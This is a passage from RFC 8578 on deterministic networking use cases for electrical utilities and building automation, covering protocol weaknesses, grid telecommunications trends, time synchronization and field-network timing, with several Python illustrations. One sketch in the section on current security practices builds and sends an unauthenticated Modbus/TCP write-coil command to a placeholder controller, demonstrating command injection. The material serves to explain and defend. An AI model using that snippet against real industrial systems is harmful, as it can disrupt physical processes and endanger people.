
RFC 8578

Deterministic Networking Use Cases

Pages: 97
Informational


3.2. Electrical Utilities Today

Many utilities still rely on complex environments consisting of multiple application-specific proprietary networks, including TDM networks. In this kind of environment, there is no mixing of Operation Technology (OT) and IT applications on the same network, and information is siloed between operational areas. Specific calibration of the full chain is required; this is costly. This kind of environment prevents utility operations from realizing operational efficiency benefits, visibility, and functional integration of operational information across grid applications and data networks.
   In addition, there are many security-related issues, as discussed in
   the following section.

3.2.1. Current Security Practices and Their Limitations

Grid-monitoring and control devices are already targets for cyber attacks, and legacy telecommunications protocols have many intrinsic network-related vulnerabilities. For example, the Distributed Network Protocol (DNP3) [IEEE-1815], Modbus, PROFIBUS/PROFINET, and other protocols are designed around a common paradigm of "request and respond". Each protocol is designed for a master device such as an HMI (Human-Machine Interface) system to send commands to subordinate slave devices to perform data retrieval (reading inputs) or control functions (writing to outputs). Because many of these protocols lack authentication, encryption, or other basic security measures, they are prone to network-based attacks, allowing a malicious actor or attacker to utilize the request-and-respond system as a mechanism for functionality similar to command and control.

Specific security concerns common to most industrial-control protocols (including utility telecommunications protocols) include the following:

   o  Network or transport errors (e.g., malformed packets or excessive
      latency) can cause protocol failure.

   o  Protocol commands may be available that are capable of forcing
      slave devices into inoperable states, including powering devices
      off, forcing them into a listen-only state, or disabling
      alarming.

   o  Protocol commands may be available that are capable of
      interrupting processes (e.g., restarting communications).

   o  Protocol commands may be available that are capable of clearing,
      erasing, or resetting diagnostic information such as counters and
      diagnostic registers.

   o  Protocol commands may be available that are capable of requesting
      sensitive information about the controllers, their
      configurations, or other need-to-know information.

   o  Most protocols are application-layer protocols transported over
      TCP; it is therefore easy to transport commands over non-standard
      ports or inject commands into authorized traffic flows.

   o  Protocol commands may be available that are capable of
      broadcasting messages to many devices at once (i.e., a potential
      DoS).
   o  Protocol commands may be available that will query the device
      network to obtain defined points and their values (i.e., perform a
      configuration scan).

   o  Protocol commands may be available that will list all available
      function codes (i.e., perform a function scan).

   These inherent vulnerabilities, along with increasing connectivity
   between IT and OT networks, make network-based attacks very feasible.
   By injecting malicious protocol commands, an attacker could take
   control over the target process.  Altering legitimate protocol
   traffic can also alter information about a process and disrupt the
   legitimate controls that are in place over that process.  A
   man-in-the-middle attack could result in (1) improper control over a
   process and (2) misrepresentation of data that is sent back to
   operator consoles.
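How little effort such injection takes can be shown with a short sketch. The following Python fragment hand-builds a Modbus/TCP "Write Single Coil" request and sends it over an ordinary TCP connection; the target address, unit identifier, and coil number are hypothetical placeholders, not values from this document. Because the base protocol carries no authentication, any host with network reachability to the controller can issue the same command as a legitimate master.

      # Minimal sketch: an unauthenticated Modbus/TCP "Write Single Coil"
      # request.  All target values below are hypothetical placeholders.
      import socket
      import struct

      TARGET = ("192.0.2.10", 502)   # 502 is the registered Modbus/TCP port
      UNIT_ID = 1                    # hypothetical unit (slave) identifier
      COIL_ADDRESS = 0x0001          # hypothetical output coil
      COIL_ON = 0xFF00               # Modbus encoding for "ON"

      # PDU: function code 0x05 (Write Single Coil) + coil address + value
      pdu = struct.pack(">BHH", 0x05, COIL_ADDRESS, COIL_ON)

      # MBAP header: transaction id, protocol id (0), remaining length, unit id
      mbap = struct.pack(">HHHB", 0x0001, 0x0000, len(pdu) + 1, UNIT_ID)

      with socket.create_connection(TARGET, timeout=2) as s:
          s.sendall(mbap + pdu)      # nothing authenticates the sender
          reply = s.recv(256)        # a normal device simply echoes the request

The frame is twelve bytes of fixed-format fields; there is no field in which the device could even look for a credential, which is exactly the class of weakness described above.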

3.3. Electrical Utilities in the Future

The business and technology trends that are sweeping the utility industry will drastically transform the utility business from the way it has been for many decades. At the core of many of these changes is a drive to modernize the electrical grid with an integrated telecommunications infrastructure. However, interoperability concerns, legacy networks, disparate tools, and stringent security requirements all add complexity to the grid's transformation. Given the range and diversity of the requirements that should be addressed by the next-generation telecommunications infrastructure, utilities need to adopt a holistic architectural approach to integrate the electrical grid with digital telecommunications across the entire power delivery chain.

The key to modernizing grid telecommunications is to provide a common, adaptable, multi-service network infrastructure for the entire utility organization. Such a network serves as the platform for current capabilities while enabling future expansion of the network to accommodate new applications and services.

To meet this diverse set of requirements both today and in the future, the next-generation utility telecommunications network will be based on an open-standards-based IP architecture. An end-to-end IP architecture takes advantage of nearly three decades of IP technology development, facilitating interoperability and device management across disparate networks and devices, as has already been demonstrated in many mission-critical and highly secure networks.
   IPv6 is seen as a future telecommunications technology for the smart
   grid; the IEC and different national committees have mandated a
   specific ad hoc group (AHG8) to define the strategy for migration to
   IPv6 for all the IEC Technical Committee 57 (TC 57) power automation
   standards.  The AHG8 has finalized its work on the migration
   strategy, and IEC TR 62357-200:2015 [IEC-62357-200:2015] has been
   issued.

   Cloud-based SCADA systems will control and monitor the critical and
   non-critical subsystems of generation systems -- for example, wind
   parks.

3.3.1. Migration to Packet-Switched Networks

Throughout the world, utilities are increasingly planning for a future based on smart-grid applications requiring advanced telecommunications systems. Many of these applications utilize packet connectivity for communicating information and control signals across the utility's WAN, made possible by technologies such as Multiprotocol Label Switching (MPLS). The data that traverses the utility WAN includes:

   o  Grid monitoring, control, and protection data

   o  Non-control grid data (e.g., asset data for condition monitoring)

   o  Data (e.g., voice and video) related to physical safety and
      security

   o  Remote worker access to corporate applications (voice, maps,
      schematics, etc.)

   o  Field area network backhaul for smart metering

   o  Distribution-grid management

   o  Enterprise traffic (email, collaboration tools, business
      applications)

WANs support this wide variety of traffic to and from substations, the transmission and distribution grid, and generation sites; between control centers; and between work locations and data centers. To maintain this rapidly expanding set of applications, many utilities are taking steps to evolve present TDM-based and frame relay infrastructures to packet systems. Packet-based networks are designed to provide greater functionalities and higher levels of service for applications, while continuing to deliver reliability and deterministic (real-time) traffic support.

3.3.2. Telecommunications Trends

In addition to the use cases addressed so far, this section covers general telecommunications topics, both current and future, that should be factored into the network architecture and design.
3.3.2.1. General Telecommunications Requirements
   o  IP connectivity everywhere

   o  Monitoring services everywhere, and from different remote centers

   o  Moving services to a virtual data center

   o  Unified access to applications/information from the corporate
      network

   o  Unified services

   o  Unified communications solutions

   o  Mix of fiber and microwave technologies - obsolescence of the
      Synchronous Optical Network / Synchronous Digital Hierarchy
      (SONET/SDH) or TDM

   o  Standardizing grid telecommunications protocols to open
      standards, to ensure interoperability

   o  Reliable telecommunications for transmission and distribution
      substations

   o  IEEE 1588 time-synchronization client/server capabilities

   o  Integration of multicast design

   o  Mapping of QoS requirements

   o  Enabling future network expansion

   o  Substation network resilience

   o  Fast convergence design

   o  Scalable headend design

   o  Defining SLAs and enabling SLA monitoring
   o  Integration of 3G/4G technologies and future technologies

   o  Ethernet connectivity for station bus architecture

   o  Ethernet connectivity for process bus architecture

   o  Protection, teleprotection, and PMUs on IP

3.3.2.2. Specific Network Topologies of Smart-Grid Applications
Utilities often have very large private telecommunications networks that can cover an entire territory/country. Until now, the main purposes of these networks have been to (1) support transmission network monitoring, control, and automation, (2) support remote control of generation sites, and (3) provide FCAPS (Fault, Configuration, Accounting, Performance, and Security) services from centralized network operation centers.

Going forward, one network will support the operation and maintenance of electrical networks (generation, transmission, and distribution), voice and data services for tens of thousands of employees and for exchanges with neighboring interconnections, and administrative services.

To meet those requirements, a utility may deploy several physical networks leveraging different technologies across the country -- for instance, an optical network and a microwave network. Each protection and automation system between two points has two telecommunications circuits, one on each network. Path diversity between two substations is key. Regardless of the event type (hurricane, ice storm, etc.), one path needs to stay available so the system can still operate.

In the optical network, signals are transmitted over more than tens of thousands of circuits using fiber optic links, microwave links, and telephone cables. This network is the nervous system of the utility's power transmission operations. The optical network represents tens of thousands of kilometers of cable deployed along the power lines, with individual runs as long as 280 km.
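As a minimal illustration of the path-diversity requirement above, the sketch below computes a primary path between two substations and then a backup path that avoids the primary's intermediate nodes, mirroring the two-circuit arrangement described in the text. The topology and substation names are hypothetical; a production planning tool would normally use a true disjoint-path algorithm (e.g., Suurballe or a max-flow formulation) rather than this greedy two-step search.

      # Sketch (hypothetical topology): provision a primary path between
      # two substations, then a backup path that avoids the primary's
      # intermediate nodes.
      from collections import deque

      def shortest_path(graph, src, dst, excluded=frozenset()):
          """Breadth-first search; returns a node list or None."""
          queue, seen = deque([[src]]), {src}
          while queue:
              path = queue.popleft()
              if path[-1] == dst:
                  return path
              for nxt in graph.get(path[-1], ()):
                  if nxt not in seen and nxt not in excluded:
                      seen.add(nxt)
                      queue.append(path + [nxt])
          return None

      # Hypothetical optical/microwave topology between substations A and F.
      topo = {
          "A": ["B", "C"], "B": ["A", "D"], "C": ["A", "E"],
          "D": ["B", "F"], "E": ["C", "F"], "F": ["D", "E"],
      }

      primary = shortest_path(topo, "A", "F")
      backup = (shortest_path(topo, "A", "F", excluded=set(primary[1:-1]))
                if primary else None)
      print("primary:", primary)   # ['A', 'B', 'D', 'F']
      print("backup: ", backup)    # ['A', 'C', 'E', 'F']

If the second search fails, the two circuits would share at least one intermediate site under this heuristic, which is exactly the condition a utility planner needs to detect and avoid.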
3.3.2.3. Precision Time Protocol
Some utilities do not use GPS clocks in generation substations. One of the main reasons is that some of the generation plants are 30 to 50 meters deep underground and the GPS signal can be weak and unreliable. Instead, atomic clocks are used. Clocks are synchronized amongst each other. Rubidium clocks provide clock and 1 ms timestamps for IRIG-B.
   Some companies plan to transition to PTP [IEEE-1588], distributing
   the synchronization signal over the IP/MPLS network.  PTP provides a
   mechanism for synchronizing the clocks of participating nodes to a
   high degree of accuracy and precision.

   PTP operates based on the following assumptions:

   o  The network eliminates cyclic forwarding of PTP messages within
      each communication path (e.g., by using a spanning tree protocol).

   o  PTP is tolerant of an occasional missed message, duplicated
      message, or message that arrived out of order.  However, PTP
      assumes that such impairments are relatively rare.

   o  As designed, PTP expects a multicast communication model; however,
      PTP also supports a unicast communication model as long as the
      behavior of the protocol is preserved.

   o  Like all message-based time transfer protocols, PTP time accuracy
      is degraded by delay asymmetry in the paths taken by event
      messages.  PTP cannot detect asymmetry, but if such delays are
      known a priori, time values can be adjusted to correct for
      asymmetry.

   The use of PTP for power automation is defined in
   IEC/IEEE 61850-9-3:2016 [IEC-IEEE-61850-9-3:2016].  It is based on
   Annex B of IEC 62439-3:2016 [IEC-62439-3:2016], which offers the
   support of redundant attachment of clocks to Parallel Redundancy
   Protocol (PRP) and High-availability Seamless Redundancy (HSR)
   networks.
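As a minimal illustration of the delay-asymmetry correction noted above, the following sketch applies the standard delay-request/response arithmetic and then subtracts an a priori known asymmetry. All timestamp values are hypothetical; the sign convention assumed here is the IEEE 1588 one in which the master-to-slave delay equals the mean path delay plus the asymmetry.

      # Sketch: PTP delay-request/response offset computation with a known
      # delay asymmetry.  t1..t4 are hypothetical nanosecond timestamps:
      #   t1: master sends Sync          t2: slave receives Sync
      #   t3: slave sends Delay_Req      t4: master receives Delay_Req
      t1, t2, t3, t4 = 1_000_000, 1_000_650, 1_020_000, 1_020_550

      # Known asymmetry (ns): master-to-slave delay minus the mean path delay.
      delay_asymmetry = 50

      mean_path_delay = ((t2 - t1) + (t4 - t3)) / 2            # 600 ns
      offset_uncorrected = ((t2 - t1) - (t4 - t3)) / 2         # +50 ns
      offset_corrected = offset_uncorrected - delay_asymmetry  # 0 ns

      print(mean_path_delay, offset_uncorrected, offset_corrected)

In this example the uncorrected result would report a 50 ns offset even though the slave is already on time; the entire apparent error comes from the asymmetric path, which is why asymmetry must either be engineered out or compensated with known values.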

3.3.3. Security Trends in Utility Networks

Although advanced telecommunications networks can assist in transforming the energy industry by playing a critical role in maintaining high levels of reliability, performance, and manageability, they also introduce the need for an integrated security infrastructure. Many of the technologies being deployed to support smart-grid projects such as smart meters and sensors can increase the vulnerability of the grid to attack. Top security concerns for utilities migrating to an intelligent smart-grid telecommunications platform center on the following trends:

   o  Integration of distributed energy resources

   o  Proliferation of digital devices to enable management,
      automation, protection, and control
   o  Regulatory mandates to comply with standards for critical
      infrastructure protection

   o  Migration to new systems for outage management, distribution
      automation, condition-based maintenance, load forecasting, and
      smart metering

   o  Demand for new levels of customer service and energy management

   This development of a diverse set of networks to support the
   integration of microgrids, open-access energy competition, and the
   use of network-controlled devices is driving the need for a converged
   security infrastructure for all participants in the smart grid,
   including utilities, energy service providers, large commercial and
   industrial customers, and residential customers.  Securing the assets
   of electric power delivery systems (from the control center to the
   substation, to the feeders and down to customer meters) requires an
   end-to-end security infrastructure that protects the myriad of
   telecommunications assets used to operate, monitor, and control power
   flow and measurement.

   "Cybersecurity" refers to all the security issues in automation and
   telecommunications that affect any functions related to the operation
   of the electric power systems.  Specifically, it involves the
   concepts of:

   o  Integrity: data cannot be altered undetectably

   o  Authenticity (data origin authentication): the telecommunications
      parties involved must be validated as genuine

   o  Authorization: only requests and commands from authorized users
      can be accepted by the system

   o  Confidentiality: data must not be accessible to any
      unauthenticated users

   When designing and deploying new smart-grid devices and
   telecommunications systems, it is imperative to understand the
   various impacts of these new components under a variety of attack
   situations on the power grid.  The consequences of a cyber attack on
   the grid telecommunications network can be catastrophic.  This is why
   security for the smart grid is not just an ad hoc feature or product;
   it's a complete framework integrating both physical and cybersecurity
   requirements and covering all smart-grid networks from
   generation to distribution.  Security has therefore become one of the
   main foundations of the utility telecom network architecture and must
   be considered at every layer with a defense-in-depth approach.
   Migrating to IP-based protocols is key to addressing these challenges
   for two reasons:

   o  IP enables a rich set of features and capabilities to enhance the
      security posture.

   o  IP is based on open standards; this allows interoperability
      between different vendors and products, driving down the costs
      associated with implementing security solutions in OT networks.

   Securing OT telecommunications over packet-switched IP networks
   follows the same principles that are foundational for securing the IT
   infrastructure, i.e., consideration must be given to (1) enforcing
   electronic access control for both person-to-machine and machine-to-
   machine communications and (2) providing the appropriate levels of
   data privacy, device and platform integrity, and threat detection and
   mitigation.

3.4. Electrical Utilities Requests to the IETF

   o  Mixed Layer 2 and Layer 3 topologies

   o  Deterministic behavior

   o  Bounded latency and jitter

   o  Tight feedback intervals

   o  High availability, low recovery time

   o  Redundancy, low packet loss

   o  Precise timing

   o  Centralized computing of deterministic paths

   o  Distributed configuration (may also be useful)

4. Building Automation Systems (BASs)

4.1. Use Case Description

A BAS manages equipment and sensors in a building for improving residents' comfort, reducing energy consumption, and responding to failures and emergencies. For example, the BAS measures the temperature of a room using sensors and then controls the HVAC (heating, ventilating, and air conditioning) to maintain a set temperature and minimize energy consumption.
   A BAS primarily performs the following functions:

   o  Periodically measures states of devices -- for example, humidity
      and illuminance of rooms, open/close state of doors, fan speed.

   o  Stores the measured data.

   o  Provides the measured data to BAS operators.

   o  Generates alarms for abnormal state of devices.

   o  Controls devices (e.g., turns room lights off at 10:00 PM).

4.2. BASs Today

4.2.1. BAS Architecture

A typical present-day BAS architecture is shown in Figure 4.

             +----------------------------+
             |                            |
             |  BMS     HMI               |
             |   |       |                |
             |   +----------------------+ |
             |   |  Management Network  | |
             |   +----------------------+ |
             |   |       |                |
             |   LC      LC               |
             |   |       |                |
             |   +----------------------+ |
             |   |    Field Network     | |
             |   +----------------------+ |
             |   |       |     |      |   |
             |  Dev     Dev   Dev    Dev  |
             |                            |
             +----------------------------+

             BMS: Building Management Server
             HMI: Human-Machine Interface
             LC:  Local Controller

                Figure 4: BAS Architecture

There are typically two layers of a network in a BAS. The upper layer is called the management network, and the lower layer is called the field network. In management networks, an IP-based communication protocol is used, while in field networks, non-IP-based communication protocols ("field protocols") are mainly used. Field networks have specific timing requirements, whereas management networks can be best effort.

   An HMI is typically a desktop PC used by operators to monitor and
   display device states, send device control commands to Local
   Controllers (LCs), and configure building schedules (for example,
   "turn off all room lights in the building at 10:00 PM").

   A building management server (BMS) performs the following operations.

   o  Collects and stores device states from LCs at regular intervals.

   o  Sends control values to LCs according to a building schedule.

   o  Sends an alarm signal to operators if it detects abnormal device
      states.

   The BMS and HMI communicate with LCs via IP-based "management
   protocols" (see standards [BACnet-IP] and [KNX]).

   An LC is typically a Programmable Logic Controller (PLC) that is
   connected to several tens or hundreds of devices using "field
   protocols".  An LC performs the following kinds of operations:

   o  Measures device states and provides the information to a BMS
      or HMI.

   o  Sends control values to devices, unilaterally or as part of a
      feedback control loop.

   At the time of this writing, many field protocols are in use; some
   are standards-based protocols, and others are proprietary (see
   standards [LonTalk], [MODBUS], [PROFIBUS], and [FL-net]).  The result
   is that BASs have multiple MAC/PHY modules and interfaces.  This
   makes BASs more expensive and slower to develop and can result in
   "vendor lock-in" with multiple types of management applications.

4.2.2. BAS Deployment Model

An example BAS for medium or large buildings is shown in Figure 5. The physical layout spans multiple floors and includes a monitoring room where the BAS management entities are located. Each floor will have one or more LCs, depending on the number of devices connected to the field network.

     +--------------------------------------------------+
     |                                          Floor 3 |
     |    +----LC~~~~+~~~~~+~~~~~+                      |
     |    |          |     |     |                      |
     |    |         Dev   Dev   Dev                     |
     |    |                                             |
     |--- | --------------------------------------------|
     |    |                                     Floor 2 |
     |    +----LC~~~~+~~~~~+~~~~~+  Field Network       |
     |    |          |     |     |                      |
     |    |         Dev   Dev   Dev                     |
     |    |                                             |
     |--- | --------------------------------------------|
     |    |                                     Floor 1 |
     |    +----LC~~~~+~~~~~+~~~~~+  +-------------------|
     |    |          |     |     |  | Monitoring Room   |
     |    |         Dev   Dev   Dev |                   |
     |    |                         |    BMS     HMI    |
     |    |   Management Network    |     |       |     |
     |    +-------------------------------+-------+     |
     |                                    |             |
     +--------------------------------------------------+

       Figure 5: BAS Deployment Model for Medium/Large Buildings

Each LC is connected to the monitoring room via the management network, and the management functions are performed within the building. In most cases, Fast Ethernet (e.g., 100BASE-T) is used for the management network. Since the management network is not a real-time network, the use of Ethernet without QoS is sufficient for today's deployments.

Many physical interfaces used in field networks have specific timing requirements -- for example, RS232C and RS485. Thus, if a field network is to be replaced with an Ethernet or wireless network, such networks must support time-critical deterministic flows.
   Figure 6 shows another deployment model, in which the management
   system is hosted remotely.  This model is becoming popular for small
   offices and residential buildings, in which a standalone monitoring
   system is not cost effective.

                                                     +---------------+
                                                     | Remote Center |
                                                     |               |
                                                     |  BMS     HMI  |
            +------------------------------------+   |   |       |   |
            |                            Floor 2 |   |   +---+---+   |
            |    +----LC~~~~+~~~~~+ Field Network|   |       |       |
            |    |          |     |              |   |     Router    |
            |    |         Dev   Dev             |   +-------|-------+
            |    |                               |           |
            |--- | ------------------------------|           |
            |    |                       Floor 1 |           |
            |    +----LC~~~~+~~~~~+              |           |
            |    |          |     |              |           |
            |    |         Dev   Dev             |           |
            |    |                               |           |
            |    |   Management Network          |     WAN   |
            |    +------------------------Router-------------+
            |                                    |
            +------------------------------------+

              Figure 6: Deployment Model for Small Buildings

   Some interoperability is possible in today's management networks but
   is not possible in today's field networks due to their non-IP-based
   design.

4.2.3. Use Cases for Field Networks

Below are use cases for environmental monitoring, fire detection, and feedback control, and their implications for field network performance.
4.2.3.1. Environmental Monitoring
The BMS polls each LC at a maximum measurement interval of 100 ms (for example, to draw a historical chart of 1-second granularity with a 10x sampling interval) and then performs the operations as specified by the operator. Each LC needs to measure each of its several hundred sensors once per measurement interval. Latency is not critical in this scenario as long as all sensor value measurements are completed within the measurement interval. Availability is expected to be 99.999%.
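A quick budget check makes the constraint concrete. The sensor count below is a hypothetical value within the "several hundred" range stated above, and the sketch assumes the LC reads its sensors sequentially; the point is that latency per read matters only insofar as the whole sweep must finish inside the 100 ms interval.

      # Sketch: per-sensor time budget for one LC within a 100 ms interval,
      # assuming sequential reads.  Sensor count is hypothetical.
      MEASUREMENT_INTERVAL_MS = 100
      SENSORS_PER_LC = 300

      budget_per_sensor_us = MEASUREMENT_INTERVAL_MS * 1000 / SENSORS_PER_LC
      print(f"{budget_per_sensor_us:.0f} us per sensor")   # ~333 us

      # Latency is acceptable as long as the full sweep fits in the interval:
      def sweep_fits(read_time_us, sensors=SENSORS_PER_LC,
                     interval_ms=MEASUREMENT_INTERVAL_MS):
          return read_time_us * sensors <= interval_ms * 1000

      print(sweep_fits(read_time_us=250))   # True:  75 ms sweep
      print(sweep_fits(read_time_us=400))   # False: 120 ms sweep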
4.2.3.2. Fire Detection
On detection of a fire, the BMS must stop the HVAC, close the fire shutters, turn on the fire sprinklers, send an alarm, etc. There are typically tens of fire sensors per LC that the BMS needs to manage. In this scenario, the measurement interval is 10-50 ms, the communication delay is 10 ms, and the availability must be 99.9999%.
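For reference, the availability figures quoted in these scenarios translate into annual downtime budgets as follows; this is straightforward arithmetic rather than an additional requirement from this document.

      # Annual downtime allowed by the availability targets in this section.
      SECONDS_PER_YEAR = 365 * 24 * 3600          # 31,536,000 s

      for availability in (0.99999, 0.999999):    # 99.999% and 99.9999%
          downtime_s = (1 - availability) * SECONDS_PER_YEAR
          print(f"{availability:.6%} -> {downtime_s:.1f} s/year")
      # 99.999000% -> 315.4 s/year  (about 5.3 minutes)
      # 99.999900% -> 31.5 s/year   (about half a minute)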
4.2.3.3. Feedback Control
BASs utilize feedback control in various ways; the most time-critical is control of DC motors, which require a short feedback interval (1-5 ms) with low communication delay (10 ms) and jitter (1 ms). The feedback interval depends on the characteristics of the device and on the requirements for the control values. There are typically tens of feedback sensors per LC. Communication delay is expected to be less than 10 ms and jitter less than 1 ms, while the availability must be 99.9999%.
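A minimal sketch of such a fixed-interval feedback loop is shown below; the 5 ms period, setpoint, gain, and sensor/actuator stand-ins are hypothetical. It schedules each iteration against an absolute deadline rather than sleeping a fixed amount, which is the usual way to keep period jitter from accumulating; the determinism itself, of course, has to come from the underlying network and operating system.

      # Sketch: fixed-period control loop with jitter measurement.
      import time

      PERIOD_S = 0.005                       # 5 ms feedback interval

      def read_sensor():                     # placeholder for a field read
          return 0.0

      def write_actuator(value):             # placeholder for a field write
          pass

      def control_loop(iterations=1000):
          next_deadline = time.monotonic()
          worst_jitter = 0.0
          for _ in range(iterations):
              next_deadline += PERIOD_S      # absolute deadline, no drift
              error = 0.0 - read_sensor()    # hypothetical setpoint of 0.0
              write_actuator(0.5 * error)    # hypothetical proportional gain
              time.sleep(max(0.0, next_deadline - time.monotonic()))
              jitter = abs(time.monotonic() - next_deadline)
              worst_jitter = max(worst_jitter, jitter)
          return worst_jitter

      print(f"worst observed period jitter: {control_loop() * 1000:.3f} ms")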

4.2.4. BAS Security Considerations

When BAS field networks were developed, it was assumed that the field networks would always be physically isolated from external networks; therefore, security was not a concern. In today's world, many BASs are managed remotely and are thus connected to shared IP networks; therefore, security is a definite concern. Note, however, that security features are not currently available in the majority of BAS field network deployments. The management network, being an IP-based network, has the protocols available to enable network security, but in practice many BASs do not implement even such available security features as device authentication or encryption for data in transit.

4.3. BASs in the Future

In the future, demand for lower energy consumption and for more fine-grained environmental monitoring will grow; meeting it will require more sensors and devices and thus larger, more complex building networks. Building networks will be connected to or converged with other networks (enterprise networks, home networks, and the Internet). Better facilities for network management, control, reliability, and security are therefore critical to improving resident and operator convenience and comfort. For example, the ability to monitor and control building devices via the Internet would enable control of room lights or HVAC from a resident's desktop PC or phone application.

4.4. BAS Requests to the IETF

The community would like to see an interoperable protocol specification that can satisfy the timing, security, availability, and QoS constraints described above, such that the resulting converged network can replace the disparate field networks. Ideally, this connectivity could extend to the open Internet. This would imply an architecture that can guarantee:

   o  Low communication delays (from <10 ms to 100 ms in a network of
      several hundred devices)

   o  Low jitter (<1 ms)

   o  Tight feedback intervals (1-10 ms)

   o  High network availability (up to 99.9999%)

   o  Availability of network data in disaster scenarios

   o  Authentication between management devices and field devices
      (both local and remote)

   o  Integrity and data origin authentication of communication data
      between management devices and field devices

   o  Confidentiality of data when communicated to a remote device

